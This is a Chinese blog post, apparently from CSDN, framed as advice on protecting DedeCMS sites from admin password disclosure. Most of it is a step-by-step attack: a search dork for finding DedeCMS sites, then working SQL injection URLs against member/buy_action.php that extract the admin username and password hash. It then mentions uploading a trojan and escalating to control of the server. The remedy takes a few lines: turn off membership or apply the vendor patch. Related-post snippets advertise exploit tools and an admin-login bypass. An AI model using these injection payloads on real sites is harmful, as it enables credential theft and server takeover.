如何防止dedecms被爆管理员密码

最新推荐文章于 2022-05-02 06:01:25 发布
最新推荐文章于 2022-05-02 06:01:25 发布
阅读量6.3k 收藏
点赞数
分类专栏: dedecms 文章标签: 服务器 sql 网络

近期来dedecms的系统还是比较安全的,但是天下没有最安全的系统,现在公布一个dedecms的漏洞,转载网络不知道是哪位大牛挖掘的。

关键字:inurl:powered by dedecms

 使用入侵步骤如下,注册个用户,注册地址:

你的域名/member/index_do.php?fmdo=user&dopost=regnew

爆管理帐号:

 你的域名/member/buy_action.php?product=member&pid=1%20and%201=11%20union%20select%201,2,userid,4,5%20from%20%23@__admin/*

爆管理员密码

你的域名/member/buy_action.php?product=member&pid=1%20and%201=11%20union%20select%201,2,substring(pwd,9,16),4,5%20from%20%23@__admin/*

 通过手工编写的sql语句提交命令,获取管理员帐号密码,拿下了后台,后面的事情就比较好做了,dedecms后台的权限是非常大的,直接上传木马,提权拿服务器即可。

补丁设置设维护置手法:

本人也不是什么高手,所以给大家说下我自己的防护手法,如果网站是没必要注册会员的,可以把会员功能关闭了,步骤如:系统-系统基本参数-会员设置 是否开启:否 即可。

 如果网站需要注册功能,官方应该发布了补丁,按照官方手法操作,补丁加上之后,直接把提交数据转向订单,无效指令。

lifeiinc
关注
专栏目录
渗透测试面试题
千寻的博客
12-31 11万+
渗透测试面试题 一.思路流程 1.信息收集 服务器的相关信息(真实ip,系统类型,版本,开放端口,WAF等) 网站指纹识别(包括,cms,cdn,证书等),dns记录 whois信息,姓名,备案,邮箱,电话反查(邮箱丢社工库,社工准备等) 子域名收集,旁站,C段等 google hacking针对化搜索,pdf文件,中间件版本,弱口令扫描等 扫描网站目录结构,后台,网站banner,测试文件,...
关于web安全之sql注入攻击
JSsomnus'sky
10-12 2446
前言:①这个晨讲我构思了两个星期,但是之前电脑坏了,一直拖到昨天才开始着手准备,时间仓促,         能力有限,不到之处请大家批评指正;       ②我尽量将文中涉及的各种技术原理,专业术语讲的更加通俗易懂,但这个前提是诸位能看得懂         基本的SQL语句(想想海璐姐你就懂了);        ③本晨讲形式为PPT+个人演讲+实际演示,但因为TTS征文限制
DeDeCMS v5.7最新利用工具[一键暴密码]0day
fengling132的专栏
07-02 4836
使用说明: 1、输入被检测网站的地址 2、请等待,时间取决于你的网络状况,和网站的速度。 3、如果网站没有漏洞的话会弹出提示。 4、成功的话会弹出一个窗口复制密码去破解就好了。 下载地址:DeDeCMS
DEDECMS 严重安全漏洞 免账号密码直接进入后台
IT技术宅-北方的刀郎
03-21 1万+
DEDECMS 严重安全漏洞 免账号密码直接进入后台来源:互联网 作者:佚名 时间:08-20 23:46:44 【大 中 小】众所周知,因使用简单、客户群多,织梦CMS一直被出许多漏洞。今天小编在群里得到织梦官方论坛某版主可靠消息:DEDECMS严重安全漏洞,近期官方会发布相关补丁,望大家及时关注补丁动态。入侵步骤如下:http://www.xx.com/织梦网站后台/login.php?
最新ASPCMS 0DAY利用工具(附VB源码)
03-25
详细使用方法在软件窗体内已经写好,直接编译执行即可使用.截止12-3-25日仍有效. 这是一个0day的EXP最好实例.
mysql 5.7 注入_dedecms5.7最新注入和上传漏洞
weixin_34832150的博客
02-10 1302
漏洞描述:百度搜索关键字Powered by DedeCMSV57_GBK 2004-2011 DesDev Inc,获得使用DeDeCMS系统的网站。 注入漏洞。首先访问/data/admin/ver.txt页面获取系统最后升级时间,然后访问/member/ajax_membergroup.php?action=postmembergroup=1页面, 然后访问/漏洞描述:百度搜索关键字“Pow...
利用安全狗防护DedeCMS v5.7高危注入漏洞 [复制链接]
IT技术宅-北方的刀郎
03-21 8365
漏洞修复版本:DedeCMS v5.7 20130607之后版本http://bbs.safedog.cn/thread-52264-1-1.html       漏洞触发条件:确保php.ini中使用php_mysql.dll同时未开启php_mysqli.dll。       漏洞触发根源:在于/include/dedesql.class.php文件中程序未初始化$arrs1和$arrs2这两
DEDECMS v5.6漏洞复现
_Ralph的博客
01-16 7998
织梦内容管理系统(dedecms) 以简单、实用、开源而闻名,是国内最知名的PHP开源网站管理系统,也是使用用户最多的PHP类cms系统,在经历多年的发展,目前的版本无论在功能,还是在易用性方面,都有了长足的发展和进步,DedeCms免费版的主要目标用户锁定在个人站长,功能更专注于个人网站或中小型门户的构建,当然也不乏有企业用户和学校等在使用该系统。 闲来无事,复现一下dedecms v5.6版
20年时候收集的一些信息安全岗面试题
课嗨教育的专栏
05-02 7690
目录 面试一 面试二 面试三 更多资料可:渗透测试基础课-课程进度_课嗨教育的博客-CSDN博客 面试一 个人介绍: 自我介绍要点:不要用长逻辑句,短小精悍 控制在3-4分钟 1、自我介绍姓名年龄哪里人学校情况不是重点,作为顺滑开场 2、经历与技能啥时候开始学web攻防,实习经历(神舟,做了什么;尚然,做了什么),让人家清楚历史引入技术主题,挑重点 3、业绩/成绩: 研究类:freebuff SRC I春秋...
安服面试点总结
1
02-22 8790
目录 3389无法连接的几种情况 二次注入 报错注入的函数 基于格式错误的报错(xpath语法错误) 基于主键重复错误 堆叠注入 判断出网站的CMS对渗透的意义 一个成熟并且相对安全的CMS,渗透时扫目录的意义? mysql注入点,用工具对目标站直接写入一句话,需要哪些条件? 1.3389无法连接的几种情况 端口没有开放 端口被修改了 被拦截了 没出网(处于内网(需要进行端口转发)) 2.二次注入 恶意数据经过一些转义函数(get_magic_quotes_gpc)的
版权文字:Power by DedeCms 如何去除?
热门推荐
草巾冒小子的博客
01-17 5万+
dedeCMS系统中的版权声明信息中含有“Power by DedeCms”字样,如何去除? dedeCMS近期的新版本至2013-6-7更新包以来,不管新版还是旧版更新补丁包,更新后网站页底都会出现power by dedecms。 * 一、power by dedecms 什么意思? 在我们上网的时候,会见到页面页底很多带power by dedecms的网站,power by dede...
织梦网站底部的Power by DedeCms怎么去掉?
weixin_34032779的博客
05-25 168
由于织梦DEDECMS程序6月份的漏洞,很多织梦网站都被黑了,所以大家都在抓紧时间更新系统补丁。但是这次的DEDECMS V5.7版本更新后,在前台网页底部会出现织梦版权信息 “powered by dedecms”,很多人都不知道怎么去掉的(不建议你去掉,毕竟程序是人家开发的,你免费用了),因为这段代码并不存在于HTM模板中。 小菜现在告诉大家怎么去除织梦底部的 powered by dede...
dede后台用户名和密码不知道办?
weixin_37288602的博客
07-19 1万+
dede后台用户名和密码不知道办?以前的网站,现在一些部分需要修改,可是人员几经变换,不知道后台的用户名和密码,怎么办?按照以下几个步骤,妥妥的找回来!1、登录服务器查看该域名的基本设置,找到物理路径的文件夹,在date中找到common.inc.php,打开查看数据库名字。2、打开数据库登陆第一步查看到的数据库,点开[表],里面所有表的命名都是xxx-xxx,找到xxx-admin,这个就是存储用
dede解密
5431的专栏
08-20 1243
dede 的密码怎么破解,dede后台。32位的DEDE密码如何破解 dede 的密码是32位MD5减去头5位,减去尾七位,得到20 MD5密码,方法是,前减3后减1,得到16位MD5。 比如我的数据库的密文是f297a57a5a743894a0e4 得到20 MD5密码,方法是,前减3后减1,得到16位MD5 这样执行后就是7a57a5a743894a0e 直接md5解
[dede漏洞]dede 后台 路径,dede后台地址查询
IT技术宅-北方的刀郎
03-21 1万+
时间:2013-03-16 23:05来源:未知 作者:admin 点击:1131次http://123.42824.com/1837.html [dede漏洞]dede 后台 路径,dede后台地址查询 今天偶尔看到dede可以后台路径,具体方法是 1.include/dialog/select_soft.php文件可以DEDECMS的后台,以前的老板本可以跳过登陆验证直接访问,无需管理
DEDECMS v5.7 loop标签调用任意表数据教程
netuser1937的博客
01-09 1345
DEDECMS v5.7 loop标签调用任意表数据教程
dedecms v5.7教程:最新版本搜索慢的问题解决办法
02-01 289
今天把织梦dedecms更新到5.7最新版本使用的时候,发现在使用搜索的时候,搜索起来非常慢,使用5.6的搜索源文件覆盖5.7的,发现问题还是存在的,但是使用5.6版本的时候就没有出现这样的问题。那问题究竟出在哪里呢?         先来说原因吧,由于dedecms5.7最新版出现了全文检索功能,但是dedecms全文搜索功能又是和Sphinx服务器关系紧密的。所以一般本地和一般的服
查找网站后台N种方法总结
酒鸿色的心专栏
11-02 1万+
查找网站后台N种方法总结 1、工具辅助查找 如大家常用的:明小子、啊D、wwwscan 以及一些列目录工具:Acunetix Web Vulnerability Scanner 、JSky、IntelliTamper、Netsparker...等等 现在很多管理员都学着把后台登陆页面放其他位置,二B的很! 清凉网站后台扫描器 V3.0内置的后台数据库也非常的全。 2、网站资源利用 如
dedecms的xss漏洞冒充管理员
最新发布
06-13
1. 对用户输入进行严格的输入验证和转义处理,防止脚本被执行。 2. 使用HTTPS加密传输,减少信息泄露的风险。 3. 更新到最新的DEDECMS版本,因为官方会修复已知的安全漏洞。 4. 启用和定期检查安全模块,如XSS清理...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值